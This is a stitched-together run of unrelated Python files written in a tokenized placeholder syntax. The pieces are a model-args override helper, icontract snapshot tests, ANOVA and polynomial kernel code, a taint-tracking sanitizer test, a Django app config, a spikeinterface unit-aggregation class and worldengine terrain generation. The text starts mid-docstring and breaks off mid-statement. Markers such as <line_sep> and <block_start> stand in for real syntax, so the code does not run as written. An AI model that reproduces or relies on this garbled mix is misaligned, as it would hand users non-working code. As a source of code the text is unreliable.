Decide which model args to keep and which to override when resolving a set of saved args and new args. We keep the new optimization or RL setting, and leave the model architecture alone. """<line_sep><global>ADVANCED_OPTIONS<line_sep>old_args,new_args=vars(old_args) vars(new_args)<for_stmt>k new_args.keys()<block_start><if_stmt>k<not><in>old_args<block_start><if_stmt>k<in>ADVANCED_OPTIONS<block_start>logger.info('Adding arg %s: %s'%(k new_args[k]))<line_sep>old_args[k]=new_args[k]<block_end><block_end><block_end><return>argparse.Namespace(**old_args)<block_end>
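# A minimal usage sketch (hypothetical namespace values, not from the original project): override_model_args keeps the saved architecture arguments and only adopts optimizer settings from the new namespace when resuming training. saved_args_demo=argparse.Namespace(emsize=300 model_type='transformer' learning_rate=0.001)<line_sep>new_args_demo=argparse.Namespace(emsize=512 model_type='rnn' learning_rate=0.01)<line_sep>merged_demo=override_model_args(saved_args_demo new_args_demo)<line_sep># learning_rate is in MODEL_OPTIMIZER, so the new value wins; emsize and model_type are architecture args and keep their saved values <assert_stmt>merged_demo.learning_rate<eq>0.01<line_sep><assert_stmt>merged_demo.emsize<eq>300<and>merged_demo.model_type<eq>'transformer'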
# pylint: disable=missing-docstring # pylint: disable=invalid-name # pylint: disable=unnecessary-lambda # pylint: disable=unused-argument # pylint: disable=no-self-use <import_stmt>textwrap<import_stmt>unittest<import_from_stmt>typing List Optional# pylint: disable=unused-import <import_stmt>icontract<import_stmt>tests.error<class_stmt>TestOK(unittest.TestCase)<block_start><def_stmt>test_without_argument self<arrow><none><block_start>z=[1]<line_sep>@icontract.snapshot(<lambda>:z[:] name="z")@icontract.ensure(<lambda>OLD val:OLD.z+[val]<eq>z)<def_stmt>some_func val:int<arrow><none><block_start>z.append(val)<block_end>some_func(2)<block_end><def_stmt>test_with_name_same_for_single_argument self<arrow><none><block_start>@icontract.snapshot(<lambda>lst:lst[:])@icontract.ensure(<lambda>OLD val lst:OLD.lst+[val]<eq>lst)<def_stmt>some_func lst:List[int] val:int<arrow><none><block_start>lst.append(val)<block_end># Expected to pass some_func([1] 2)<block_end><def_stmt>test_with_custom_name_for_single_argument self<arrow><none><block_start>@icontract.snapshot(<lambda>lst:len(lst) name="len_lst")@icontract.ensure(<lambda>OLD val lst:OLD.len_lst+1<eq>len(lst))<def_stmt>some_func lst:List[int] val:int<arrow><none><block_start>lst.append(val)<block_end># Expected to pass some_func([1] 2)<block_end><def_stmt>test_with_multiple_arguments self<arrow><none><block_start>@icontract.snapshot(<lambda>lst_a lst_b:set(lst_a).union(lst_b) name="union")@icontract.ensure(<lambda>OLD lst_a lst_b:set(lst_a).union(lst_b)<eq>OLD.union)<def_stmt>some_func lst_a:List[int] lst_b:List[int]<arrow><none><block_start><pass><block_end># Expected to pass some_func(lst_a=[1 2] lst_b=[3 4])<block_end><block_end><class_stmt>TestViolation(unittest.TestCase)<block_start><def_stmt>test_with_name_same_as_argument self<arrow><none><block_start>@icontract.snapshot(<lambda>lst:lst[:])@icontract.ensure(<lambda>OLD val lst:OLD.lst+[val]<eq>lst)<def_stmt>some_func lst:List[int] val:int<arrow><none><block_start>lst.append(val)<line_sep>lst.append(1984)<block_end>violation_error=<none># type: Optional[icontract.ViolationError] <try_stmt><block_start>some_func([1] 2)<block_end><except_stmt>icontract.ViolationError<as>err<block_start>violation_error=err<block_end>self.assertIsNotNone(violation_error)<line_sep>self.assertEqual(textwrap.dedent("""\ OLD.lst + [val] == lst: OLD was a bunch of OLD values OLD.lst was [1] lst was [1, 2, 1984] result was None val was 2""") tests.error.wo_mandatory_location(str(violation_error)))<block_end><def_stmt>test_with_custom_name self<arrow><none><block_start>@icontract.snapshot(<lambda>lst:len(lst) name="len_lst")@icontract.ensure(<lambda>OLD val lst:OLD.len_lst+1<eq>len(lst))<def_stmt>some_func lst:List[int] val:int<arrow><none><block_start>lst.append(val)<line_sep>lst.append(1984)<block_end>violation_error=<none># type: Optional[icontract.ViolationError] <try_stmt><block_start>some_func([1] 2)<block_end><except_stmt>icontract.ViolationError<as>err<block_start>violation_error=err<block_end>self.assertIsNotNone(violation_error)<line_sep>self.assertEqual(textwrap.dedent("""\ OLD.len_lst + 1 == len(lst): OLD was a bunch of OLD values OLD.len_lst was 1 len(lst) was 3 lst was [1, 2, 1984] result was None val was 2""") tests.error.wo_mandatory_location(str(violation_error)))<block_end><def_stmt>test_with_multiple_arguments self<arrow><none><block_start>@icontract.snapshot(<lambda>lst_a lst_b:set(lst_a).union(lst_b) name="union")@icontract.ensure(<lambda>OLD lst_a 
lst_b:set(lst_a).union(lst_b)<eq>OLD.union)<def_stmt>some_func lst_a:List[int] lst_b:List[int]<arrow><none><block_start>lst_a.append(1984)<block_end># bug violation_error=<none># type: Optional[icontract.ViolationError] <try_stmt><block_start>some_func(lst_a=[1 2] lst_b=[3 4])<block_end><except_stmt>icontract.ViolationError<as>err<block_start>violation_error=err<block_end>self.assertIsNotNone(violation_error)<line_sep>self.assertEqual(textwrap.dedent('''\ set(lst_a).union(lst_b) == OLD.union: OLD was a bunch of OLD values OLD.union was {1, 2, 3, 4} lst_a was [1, 2, 1984] lst_b was [3, 4] result was None set(lst_a) was {1, 2, 1984} set(lst_a).union(lst_b) was {1, 2, 3, 4, 1984}''') tests.error.wo_mandatory_location(str(violation_error)))<block_end><block_end><class_stmt>TestInvalid(unittest.TestCase)<block_start><def_stmt>test_missing_snapshot_but_old_in_postcondition self<arrow><none><block_start>@icontract.ensure(<lambda>OLD val lst:OLD.len_lst+1<eq>len(lst))<def_stmt>some_func lst:List[int] val:int<arrow><none><block_start>lst.append(val)<block_end>type_error=<none># type: Optional[TypeError] <try_stmt><block_start>some_func([1] 2)<block_end><except_stmt>TypeError<as>err<block_start>type_error=err<block_end>self.assertIsNotNone(type_error)<line_sep>self.assertEqual("The argument(s) of the contract condition have not been set: ['OLD']. "<concat>"Does the original function define them? Did you supply them in the call? "<concat>"Did you decorate the function with a snapshot to capture OLD values?" tests.error.wo_mandatory_location(str(type_error)))<block_end><def_stmt>test_conflicting_snapshots_with_argument_name self<arrow><none><block_start>value_error=<none># type: Optional[ValueError] <try_stmt># pylint: disable=unused-variable <block_start>@icontract.snapshot(<lambda>lst:lst[:])@icontract.snapshot(<lambda>lst:lst[:])@icontract.ensure(<lambda>OLD val lst:len(OLD.lst)+1<eq>len(lst))<def_stmt>some_func lst:List[int] val:int<arrow><none><block_start>lst.append(val)<block_end><block_end><except_stmt>ValueError<as>err<block_start>value_error=err<block_end>self.assertIsNotNone(value_error)<line_sep>self.assertEqual("There are conflicting snapshots with the name: 'lst'" str(value_error))<block_end><def_stmt>test_conflicting_snapshots_with_custom_name self<arrow><none><block_start>value_error=<none># type: Optional[ValueError] <try_stmt># pylint: disable=unused-variable <block_start>@icontract.snapshot(<lambda>lst:len(lst) name='len_lst')@icontract.snapshot(<lambda>lst:len(lst) name='len_lst')@icontract.ensure(<lambda>OLD val lst:OLD.len_lst+1<eq>len(lst))<def_stmt>some_func lst:List[int] val:int<arrow><none><block_start>lst.append(val)<block_end><block_end><except_stmt>ValueError<as>err<block_start>value_error=err<block_end>self.assertIsNotNone(value_error)<line_sep>self.assertEqual("There are conflicting snapshots with the name: 'len_lst'" str(value_error))<block_end><def_stmt>test_with_invalid_argument self<arrow><none># lst versus a_list <block_start>type_error=<none># type: Optional[TypeError] <try_stmt><block_start>@icontract.snapshot(<lambda>lst:len(lst) name='len_lst')@icontract.ensure(<lambda>OLD val a_list:OLD.len_lst+1<eq>len(a_list))<def_stmt>some_func a_list:List[int] val:int<arrow><none><block_start>a_list.append(val)<block_end>some_func([1] 2)<block_end><except_stmt>TypeError<as>err<block_start>type_error=err<block_end>self.assertIsNotNone(type_error)<line_sep>self.assertEqual("The argument(s) of the snapshot have not been set: ['lst']. 
"<concat>"Does the original function define them? Did you supply them in the call?" tests.error.wo_mandatory_location(str(type_error)))<block_end><def_stmt>test_with_no_arguments_and_no_name self<arrow><none><block_start>z=[1]<line_sep>value_error=<none># type: Optional[ValueError] <try_stmt># pylint: disable=unused-variable <block_start>@icontract.snapshot(<lambda>:z[:])@icontract.ensure(<lambda>OLD val:OLD.z+[val]<eq>z)<def_stmt>some_func val:int<arrow><none><block_start>z.append(val)<block_end><block_end><except_stmt>ValueError<as>err<block_start>value_error=err<block_end>self.assertIsNotNone(value_error)<line_sep>self.assertEqual("You must name a snapshot if no argument was given in the capture function." str(value_error))<block_end><def_stmt>test_with_multiple_arguments_and_no_name self<arrow><none><block_start>value_error=<none># type: Optional[ValueError] <try_stmt># pylint: disable=unused-variable <block_start>@icontract.snapshot(<lambda>lst_a lst_b:set(lst_a).union(lst_b))@icontract.ensure(<lambda>OLD lst_a lst_b:set(lst_a).union(lst_b)<eq>OLD.union)<def_stmt>some_func lst_a:List[int] lst_b:List[int]<arrow><none><block_start><pass><block_end><block_end><except_stmt>ValueError<as>err<block_start>value_error=err<block_end>self.assertIsNotNone(value_error)<line_sep>self.assertEqual("You must name a snapshot if multiple arguments were given in the capture function." str(value_error))<block_end><def_stmt>test_with_no_postcondition self<arrow><none><block_start>value_error=<none># type: Optional[ValueError] <try_stmt># pylint: disable=unused-variable <block_start>@icontract.snapshot(<lambda>lst:lst[:])<def_stmt>some_func lst:List[int]<arrow><none><block_start><return><block_end><block_end><except_stmt>ValueError<as>err<block_start>value_error=err<block_end>self.assertIsNotNone(value_error)<line_sep>self.assertEqual("You are decorating a function with a snapshot, "<concat>"but no postcondition was defined on the function before." str(value_error))<block_end><def_stmt>test_missing_old_attribute self<arrow><none><block_start>@icontract.snapshot(<lambda>lst:lst[:])@icontract.ensure(<lambda>OLD lst:OLD.len_list<eq>lst)# We miss len_lst in OLD here! <def_stmt>some_func lst:List[int]<arrow><none><block_start><return><block_end>attribute_error=<none># type: Optional[AttributeError] <try_stmt><block_start>some_func(lst=[1 2 3])<block_end><except_stmt>AttributeError<as>error<block_start>attribute_error=error<block_end><assert_stmt>attribute_error<is><not><none><line_sep>self.assertEqual("The snapshot with the name 'len_list' is not available in the OLD of a postcondition. "<concat>"Have you decorated the function with a corresponding snapshot decorator?" str(attribute_error))<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end>
# Author: <NAME> <<EMAIL>> # License: Simplified BSD <import_from_stmt>sklearn.metrics.pairwise polynomial_kernel<import_from_stmt>sklearn.utils.extmath safe_sparse_dot<import_from_stmt>scipy.sparse issparse<import_stmt>numpy<as>np<def_stmt>safe_power X degree=2<block_start>"""Element-wise power supporting both sparse and dense data. Parameters ---------- X : ndarray or sparse The array whose entries to raise to the power. degree : int, default: 2 The power to which to raise the elements. Returns ------- X_ret : ndarray or sparse Same shape as X, but (x_ret)_ij = (x)_ij ^ degree """<if_stmt>issparse(X)<block_start><if_stmt>hasattr(X 'power')<block_start><return>X.power(degree)<block_end><else_stmt># old scipy <block_start>X=X.copy()<line_sep>X.data<augpow>degree<line_sep><return>X<block_end><block_end><else_stmt><block_start><return>X<power>degree<block_end><block_end><def_stmt>_D X P degree=2<block_start>"""The "replacement" part of the homogeneous polynomial kernel. D[i, j] = sum_k [(X_ik * P_jk) ** degree] """<line_sep><return>safe_sparse_dot(safe_power(X degree) P.T<power>degree)<block_end><def_stmt>homogeneous_kernel X P degree=2<block_start>"""Convenience alias for homogeneous polynomial kernel between X and P:: K_P(x, p) = <x, p> ^ degree Parameters ---------- X : ndarray of shape (n_samples_1, n_features) P : ndarray of shape (n_samples_2, n_features) degree : int, default 2 Returns ------- Gram matrix : array of shape (n_samples_1, n_samples_2) """<line_sep><return>polynomial_kernel(X P degree=degree gamma=1 coef0=0)<block_end><def_stmt>anova_kernel X P degree=2<block_start>"""ANOVA kernel between X and P:: K_A(x, p) = sum_i1>i2>...>id x_i1 p_i1 x_i2 p_i2 ... x_id p_id See <NAME> and <NAME>, Kernel Methods for Pattern Analysis section 9.2. Parameters ---------- X : ndarray of shape (n_samples_1, n_features) P : ndarray of shape (n_samples_2, n_features) degree : int, default 2 Returns ------- Gram matrix : array of shape (n_samples_1, n_samples_2) """<if_stmt>degree<eq>2<block_start>K=homogeneous_kernel(X P degree=2)<line_sep>K<augsub>_D(X P degree=2)<line_sep>K<augdiv>2<block_end><elif_stmt>degree<eq>3<block_start>K=homogeneous_kernel(X P degree=3)<line_sep>K<augsub>3<times>_D(X P degree=2)<times>_D(X P degree=1)<line_sep>K<augadd>2<times>_D(X P degree=3)<line_sep>K<augdiv>6<block_end><else_stmt><block_start><raise>NotImplementedError("ANOVA kernel for degree >= 4 not yet "<concat>"implemented efficiently.")<block_end><return>K<block_end><def_stmt>_poly_predict X P lams kernel degree=2<block_start><if_stmt>kernel<eq>"anova"<block_start>K=anova_kernel(X P degree)<block_end><elif_stmt>kernel<eq>"poly"<block_start>K=homogeneous_kernel(X P degree)<block_end><else_stmt><block_start><raise>ValueError(("Unsupported kernel: {}. Use one "<concat>"of {{'anova'|'poly'}}").format(kernel))<block_end><return>np.dot(K lams)<block_end>
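# A small numerical sanity check (a hedged illustration with made-up inputs, not part of the original library): for degree=2 the ANOVA kernel sums x_i*p_i*x_j*p_j over pairs of distinct indices counted once, so x=[1, 2, 3] against p=[1, 1, 1] gives 1*2 + 1*3 + 2*3 = 11, which equals (dot(x, p)**2 - sum_i (x_i*p_i)**2) / 2 = (36 - 14) / 2. X_demo=np.array([[1. 2. 3.]])<line_sep>P_demo=np.array([[1. 1. 1.]])<line_sep><assert_stmt>np.allclose(homogeneous_kernel(X_demo P_demo degree=2) [[36.]])<line_sep><assert_stmt>np.allclose(anova_kernel(X_demo P_demo degree=2) [[11.]])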
<def_stmt>random_choice <block_start><return>bool(GLOBAL_UNKOWN_VAR)<block_end><def_stmt>is_safe arg<block_start><return>UNKNOWN_FUNC(arg)<block_end><def_stmt>true_func <block_start><return><true><block_end><def_stmt>test_basic <block_start>s=TAINTED_STRING<if_stmt>is_safe(s)<block_start>ensure_not_tainted(s)<block_end><else_stmt><block_start>ensure_tainted(s)<block_end><if_stmt><not>is_safe(s)<block_start>ensure_tainted(s)<block_end><else_stmt><block_start>ensure_not_tainted(s)<block_end><block_end><def_stmt>test_or <block_start>s=TAINTED_STRING<line_sep># x or y <if_stmt>is_safe(s)<or>random_choice()<block_start>ensure_tainted(s)# might be tainted <block_end><else_stmt><block_start>ensure_tainted(s)<block_end># must be tainted # not (x or y) <if_stmt><not>(is_safe(s)<or>random_choice())<block_start>ensure_tainted(s)# must be tainted <block_end><else_stmt><block_start>ensure_tainted(s)<block_end># might be tainted # not (x or y) == not x and not y [de Morgan's laws] <if_stmt><not>is_safe(s)<and><not>random_choice()<block_start>ensure_tainted(s)# must be tainted <block_end><else_stmt><block_start>ensure_tainted(s)<block_end><block_end># might be tainted <def_stmt>test_and <block_start>s=TAINTED_STRING<line_sep># x and y <if_stmt>is_safe(s)<and>random_choice()<block_start>ensure_not_tainted(s)# must not be tainted <block_end><else_stmt><block_start>ensure_tainted(s)<block_end># might be tainted # not (x and y) <if_stmt><not>(is_safe(s)<and>random_choice())<block_start>ensure_tainted(s)# might be tainted <block_end><else_stmt><block_start>ensure_not_tainted(s)<block_end># not (x and y) == not x or not y [de Morgan's laws] <if_stmt><not>is_safe(s)<or><not>random_choice()<block_start>ensure_tainted(s)# might be tainted <block_end><else_stmt><block_start>ensure_not_tainted(s)<block_end><block_end><def_stmt>test_tricky <block_start>s=TAINTED_STRING<line_sep>x=is_safe(s)<if_stmt>x<block_start>ensure_not_tainted(s)<block_end># FP s_=s<if_stmt>is_safe(s)<block_start>ensure_not_tainted(s_)<block_end><block_end># FP <def_stmt>test_nesting_not <block_start>s=TAINTED_STRING<if_stmt><not>(<not>(is_safe(s)))<block_start>ensure_not_tainted(s)<block_end><else_stmt><block_start>ensure_tainted(s)<block_end><if_stmt><not>(<not>(<not>(is_safe(s))))<block_start>ensure_tainted(s)<block_end><else_stmt><block_start>ensure_not_tainted(s)<block_end><block_end># Adding `and True` makes the sanitizer trigger when it would otherwise not. See output in # SanitizedEdges.expected and compare with `test_nesting_not` and `test_basic` <def_stmt>test_nesting_not_with_and_true <block_start>s=TAINTED_STRING<if_stmt><not>(is_safe(s)<and><true>)<block_start>ensure_tainted(s)<block_end><else_stmt><block_start>ensure_not_tainted(s)<block_end><if_stmt><not>(<not>(is_safe(s)<and><true>))<block_start>ensure_not_tainted(s)<block_end><else_stmt><block_start>ensure_tainted(s)<block_end><if_stmt><not>(<not>(<not>(is_safe(s)<and><true>)))<block_start>ensure_tainted(s)<block_end><else_stmt><block_start>ensure_not_tainted(s)<block_end><block_end>
<import_from_stmt>django.apps AppConfig<class_stmt>ResourcesConfig(AppConfig)<block_start>"""AppConfig instance for Resources app."""<line_sep>name='resources'<block_end>
<import_from_stmt>typing List Union<import_stmt>numpy<as>np<import_from_stmt>.basesorting BaseSorting BaseSortingSegment<class_stmt>UnitsAggregationSorting(BaseSorting)<block_start>""" Class that handles aggregating units from different sortings, e.g. from different channel groups. Do not use this class directly but use `si.aggregate_units(...)` """<def_stmt>__init__ self sorting_list renamed_unit_ids=<none><block_start>unit_map={}<line_sep>num_all_units=sum([sort.get_num_units()<for>sort sorting_list])<if_stmt>renamed_unit_ids<is><not><none><block_start><assert_stmt>len(np.unique(renamed_unit_ids))<eq>num_all_units "'renamed_unit_ids' doesn't have the right size"<concat>"or has duplicates!"<line_sep>unit_ids=list(renamed_unit_ids)<block_end><else_stmt><block_start>unit_ids=list(np.arange(num_all_units))<block_end># unit map maps unit ids that are used to get spike trains u_id=0<for_stmt>s_i,sorting enumerate(sorting_list)<block_start>single_unit_ids=sorting.get_unit_ids()<for_stmt>unit_id single_unit_ids<block_start>unit_map[unit_ids[u_id]]={'sorting_id':s_i 'unit_id':unit_id}<line_sep>u_id<augadd>1<block_end><block_end>sampling_frequency=sorting_list[0].get_sampling_frequency()<line_sep>num_segments=sorting_list[0].get_num_segments()<line_sep>ok1=all(sampling_frequency<eq>sort.get_sampling_frequency()<for>sort sorting_list)<line_sep>ok2=all(num_segments<eq>sort.get_num_segments()<for>sort sorting_list)<if_stmt><not>(ok1<and>ok2)<block_start><raise>ValueError("Sortings don't have the same sampling_frequency/num_segments")<block_end>BaseSorting.__init__(self sampling_frequency unit_ids)<line_sep>property_keys=sorting_list[0].get_property_keys()<line_sep>property_dict={}<for_stmt>prop_name property_keys<block_start><if_stmt>all([prop_name<in>sort.get_property_keys()<for>sort sorting_list])<block_start><for_stmt>i_s,sort enumerate(sorting_list)<block_start>prop_value=sort.get_property(prop_name)<if_stmt>i_s<eq>0<block_start>property_dict[prop_name]=prop_value<block_end><else_stmt><block_start><try_stmt><block_start>property_dict[prop_name]=np.concatenate((property_dict[prop_name] sort.get_property(prop_name)))<block_end><except_stmt>Exception<as>e<block_start>print(f"Skipping property '{prop_name}' for shape inconsistency")<del_stmt>property_dict[prop_name]<line_sep><break><block_end><block_end><block_end><block_end><block_end><for_stmt>prop_name,prop_values property_dict.items()<block_start>self.set_property(key=prop_name values=prop_values)<block_end># add segments <for_stmt>i_seg range(num_segments)<block_start>parent_segments=[sort._sorting_segments[i_seg]<for>sort sorting_list]<line_sep>sub_segment=UnitsAggregationSortingSegment(unit_map parent_segments)<line_sep>self.add_sorting_segment(sub_segment)<block_end>self._sortings=sorting_list<line_sep>self._kwargs={'sorting_list':[sort.to_dict()<for>sort sorting_list] 'renamed_unit_ids':renamed_unit_ids}<block_end>@property<def_stmt>sortings self<block_start><return>self._sortings<block_end><block_end><class_stmt>UnitsAggregationSortingSegment(BaseSortingSegment)<block_start><def_stmt>__init__ self unit_map parent_segments<block_start>BaseSortingSegment.__init__(self)<line_sep>self._unit_map=unit_map<line_sep>self._parent_segments=parent_segments<block_end><def_stmt>get_unit_spike_train self unit_id start_frame:Union[int <none>]=<none> end_frame:Union[int <none>]=<none> 
<arrow>np.ndarray<block_start>sorting_id=self._unit_map[unit_id]['sorting_id']<line_sep>unit_id_sorting=self._unit_map[unit_id]['unit_id']<line_sep>times=self._parent_segments[sorting_id].get_unit_spike_train(unit_id_sorting start_frame end_frame)<line_sep><return>times<block_end><block_end><def_stmt>aggregate_units sorting_list renamed_unit_ids=<none><block_start>""" Aggregates units of multiple sortings into a single sorting object Parameters ---------- sorting_list: list List of BaseSorting objects to aggregate renamed_unit_ids: array-like If given, unit ids are renamed as provided. If None, unit ids are sequential integers. Returns ------- aggregate_sorting: UnitsAggregationSorting The aggregated sorting object """<line_sep><return>UnitsAggregationSorting(sorting_list renamed_unit_ids)<block_end>
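A minimal usage sketch for the aggregation helper above. It assumes a spikeinterface installation where toy_example and aggregate_units are importable as shown; the exact import paths and the toy_example keyword arguments are assumptions and vary between releases.

# Hypothetical example: aggregate two toy sortings into a single sorting object.
import spikeinterface.extractors as se
from spikeinterface import aggregate_units  # assumed top-level re-export, as the docstring above suggests

# toy_example is assumed to return (recording, sorting); only the sortings are used here.
_, sorting_a = se.toy_example(num_units=5, duration=10, seed=0)
_, sorting_b = se.toy_example(num_units=3, duration=10, seed=1)

aggregated = aggregate_units([sorting_a, sorting_b])
print(aggregated.get_num_units())  # 8 units, renumbered 0..7 because renamed_unit_ids is None
print(aggregated.get_unit_spike_train(unit_id=0, segment_index=0))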
<import_stmt>numpy<import_from_stmt>noise snoise2<import_from_stmt>worldengine.model.world Step<import_from_stmt>worldengine.simulations.basic find_threshold_f<import_from_stmt>worldengine.simulations.hydrology WatermapSimulation<import_from_stmt>worldengine.simulations.irrigation IrrigationSimulation<import_from_stmt>worldengine.simulations.humidity HumiditySimulation<import_from_stmt>worldengine.simulations.temperature TemperatureSimulation<import_from_stmt>worldengine.simulations.permeability PermeabilitySimulation<import_from_stmt>worldengine.simulations.erosion ErosionSimulation<import_from_stmt>worldengine.simulations.precipitation PrecipitationSimulation<import_from_stmt>worldengine.simulations.biome BiomeSimulation<import_from_stmt>worldengine.simulations.icecap IcecapSimulation<import_from_stmt>worldengine.common anti_alias get_verbose<line_sep># ------------------ # Initial generation # ------------------ <def_stmt>center_land world<block_start>"""Translate the map horizontally and vertically to put as much ocean as possible at the borders. It operates on elevation and plates map"""<line_sep>y_sums=world.layers['elevation'].data.sum(1)# 1 == sum along x-axis y_with_min_sum=y_sums.argmin()<if_stmt>get_verbose()<block_start>print("geo.center_land: height complete")<block_end>x_sums=world.layers['elevation'].data.sum(0)# 0 == sum along y-axis x_with_min_sum=x_sums.argmin()<if_stmt>get_verbose()<block_start>print("geo.center_land: width complete")<block_end>latshift=0<line_sep>world.layers['elevation'].data=numpy.roll(numpy.roll(world.layers['elevation'].data -y_with_min_sum+latshift axis=0) -x_with_min_sum axis=1)<line_sep>world.layers['plates'].data=numpy.roll(numpy.roll(world.layers['plates'].data -y_with_min_sum+latshift axis=0) -x_with_min_sum axis=1)<if_stmt>get_verbose()<block_start>print("geo.center_land: width complete")<block_end><block_end><def_stmt>place_oceans_at_map_borders world<block_start>""" Lower the elevation near the border of the map """<line_sep>ocean_border=int(min(30 max(world.width/5 world.height/5)))<def_stmt>place_ocean x y i<block_start>world.layers['elevation'].data[y x]=(world.layers['elevation'].data[y x]<times>i)/ocean_border<block_end><for_stmt>x range(world.width)<block_start><for_stmt>i range(ocean_border)<block_start>place_ocean(x i i)<line_sep>place_ocean(x world.height-i-1 i)<block_end><block_end><for_stmt>y range(world.height)<block_start><for_stmt>i range(ocean_border)<block_start>place_ocean(i y i)<line_sep>place_ocean(world.width-i-1 y i)<block_end><block_end><block_end><def_stmt>add_noise_to_elevation world seed<block_start>octaves=8<line_sep>freq=16.0<times>octaves<for_stmt>y range(world.height)<block_start><for_stmt>x range(world.width)<block_start>n=snoise2(x/freq<times>2 y/freq<times>2 octaves base=seed)<line_sep>world.layers['elevation'].data[y x]<augadd>n<block_end><block_end><block_end><def_stmt>fill_ocean elevation sea_level#TODO: Make more use of numpy? 
<block_start>height,width=elevation.shape<line_sep>ocean=numpy.zeros(elevation.shape dtype=bool)<line_sep>to_expand=[]<for_stmt>x range(width)#handle top and bottom border of the map <block_start><if_stmt>elevation[0 x]<le>sea_level<block_start>to_expand.append((x 0))<block_end><if_stmt>elevation[height-1 x]<le>sea_level<block_start>to_expand.append((x height-1))<block_end><block_end><for_stmt>y range(height)#handle left- and rightmost border of the map <block_start><if_stmt>elevation[y 0]<le>sea_level<block_start>to_expand.append((0 y))<block_end><if_stmt>elevation[y width-1]<le>sea_level<block_start>to_expand.append((width-1 y))<block_end><block_end><for_stmt>t to_expand<block_start>tx,ty=t<if_stmt><not>ocean[ty tx]<block_start>ocean[ty tx]=<true><for_stmt>px,py _around(tx ty width height)<block_start><if_stmt><not>ocean[py px]<and>elevation[py px]<le>sea_level<block_start>to_expand.append((px py))<block_end><block_end><block_end><block_end><return>ocean<block_end><def_stmt>initialize_ocean_and_thresholds world ocean_level=1.0<block_start>""" Calculate the ocean, the sea depth and the elevation thresholds :param world: a world having elevation but not thresholds :param ocean_level: the elevation representing the ocean level :return: nothing, the world will be changed """<line_sep>e=world.layers['elevation'].data<line_sep>ocean=fill_ocean(e ocean_level)<line_sep>hl=find_threshold_f(e 0.10)# the highest 10% of all (!) land are declared hills ml=find_threshold_f(e 0.03)# the highest 3% are declared mountains e_th=[('sea' ocean_level) ('plain' hl) ('hill' ml) ('mountain' <none>)]<line_sep>harmonize_ocean(ocean e ocean_level)<line_sep>world.ocean=ocean<line_sep>world.elevation=(e e_th)<line_sep>world.sea_depth=sea_depth(world ocean_level)<block_end><def_stmt>harmonize_ocean ocean elevation ocean_level<block_start>""" The goal of this function is to make the ocean floor less noisy. 
The underwater erosion should cause the ocean floor to be more uniform """<line_sep>shallow_sea=ocean_level<times>0.85<line_sep>midpoint=shallow_sea/2.0<line_sep>ocean_points=numpy.logical_and(elevation<l>shallow_sea ocean)<line_sep>shallow_ocean=numpy.logical_and(elevation<l>midpoint ocean_points)<line_sep>elevation[shallow_ocean]=midpoint-((midpoint-elevation[shallow_ocean])/5.0)<line_sep>deep_ocean=numpy.logical_and(elevation<g>midpoint ocean_points)<line_sep>elevation[deep_ocean]=midpoint+((elevation[deep_ocean]-midpoint)/5.0)<block_end># ---- # Misc # ---- <def_stmt>sea_depth world sea_level# a dynamic programming approach to gather how far the next land is # from a given coordinate up to a maximum distance of max_radius # result is 0 for land coordinates and -1 for coordinates further than # max_radius away from land # there might be even faster ways but it does the trick <block_start><def_stmt>next_land_dynamic ocean max_radius=5<block_start>next_land=numpy.full(ocean.shape -1 int)<line_sep># non ocean tiles are zero distance away from next land next_land[numpy.logical_not(ocean)]=0<line_sep>height,width=ocean.shape<for_stmt>dist range(max_radius)<block_start>indices=numpy.transpose(numpy.where(next_land<eq>dist))<for_stmt>y,x indices<block_start><for_stmt>dy range(-1 2)<block_start>ny=y+dy<if_stmt>0<le>ny<l>height<block_start><for_stmt>dx range(-1 2)<block_start>nx=x+dx<if_stmt>0<le>nx<l>width<block_start><if_stmt>next_land[ny nx]<eq>-1<block_start>next_land[ny nx]=dist+1<block_end><block_end><block_end><block_end><block_end><block_end><block_end><return>next_land<block_end># We want to multiply the raw sea_depth by one of these factors # depending on the distance from the next land # possible TODO: make this a parameter factors=[0.0 0.3 0.5 0.7 0.9]<line_sep>next_land=next_land_dynamic(world.layers['ocean'].data)<line_sep>sea_depth=sea_level-world.layers['elevation'].data<for_stmt>y range(world.height)<block_start><for_stmt>x range(world.width)<block_start>dist_to_next_land=next_land[y x]<if_stmt>dist_to_next_land<g>0<block_start>sea_depth[y x]<augmul>factors[dist_to_next_land-1]<block_end><block_end><block_end>sea_depth=anti_alias(sea_depth 10)<line_sep>min_depth=sea_depth.min()<line_sep>max_depth=sea_depth.max()<line_sep>sea_depth=(sea_depth-min_depth)/(max_depth-min_depth)<line_sep><return>sea_depth<block_end><def_stmt>_around x y width height<block_start>ps=[]<for_stmt>dx range(-1 2)<block_start>nx=x+dx<if_stmt>0<le>nx<l>width<block_start><for_stmt>dy range(-1 2)<block_start>ny=y+dy<if_stmt>0<le>ny<l>height<and>(dx<ne>0<or>dy<ne>0)<block_start>ps.append((nx ny))<block_end><block_end><block_end><block_end><return>ps<block_end><def_stmt>generate_world w step<block_start><if_stmt>isinstance(step str)<block_start>step=Step.get_by_name(step)<block_end><if_stmt><not>step.include_precipitations<block_start><return>w<block_end># Prepare sufficient seeds for the different steps of the generation rng=numpy.random.RandomState(w.seed)# create a fresh RNG in case the global RNG is compromised (i.e. 
has been queried an indefinite amount of times before generate_world() was called) sub_seeds=rng.randint(0 numpy.iinfo(numpy.int32).max size=100)# choose lowest common denominator (32 bit Windows numpy cannot handle a larger value) seed_dict={'PrecipitationSimulation':sub_seeds[0] # after 0.19.0 do not ever switch out the seeds here to maximize seed-compatibility 'ErosionSimulation':sub_seeds[1] 'WatermapSimulation':sub_seeds[2] 'IrrigationSimulation':sub_seeds[3] 'TemperatureSimulation':sub_seeds[4] 'HumiditySimulation':sub_seeds[5] 'PermeabilitySimulation':sub_seeds[6] 'BiomeSimulation':sub_seeds[7] 'IcecapSimulation':sub_seeds[8] '':sub_seeds[99]}<line_sep>TemperatureSimulation().execute(w seed_dict['TemperatureSimulation'])<line_sep># Precipitation with thresholds PrecipitationSimulation().execute(w seed_dict['PrecipitationSimulation'])<if_stmt><not>step.include_erosion<block_start><return>w<block_end>ErosionSimulation().execute(w seed_dict['ErosionSimulation'])# seed not currently used <if_stmt>get_verbose()<block_start>print("...erosion calculated")<block_end>WatermapSimulation().execute(w seed_dict['WatermapSimulation'])# seed not currently used # FIXME: create setters IrrigationSimulation().execute(w seed_dict['IrrigationSimulation'])# seed not currently used HumiditySimulation().execute(w seed_dict['HumiditySimulation'])# seed not currently used PermeabilitySimulation().execute(w seed_dict['PermeabilitySimulation'])<line_sep>cm,biome_cm=BiomeSimulation().execute(w seed_dict['BiomeSimulation'])# seed not currently used <for_stmt>cl 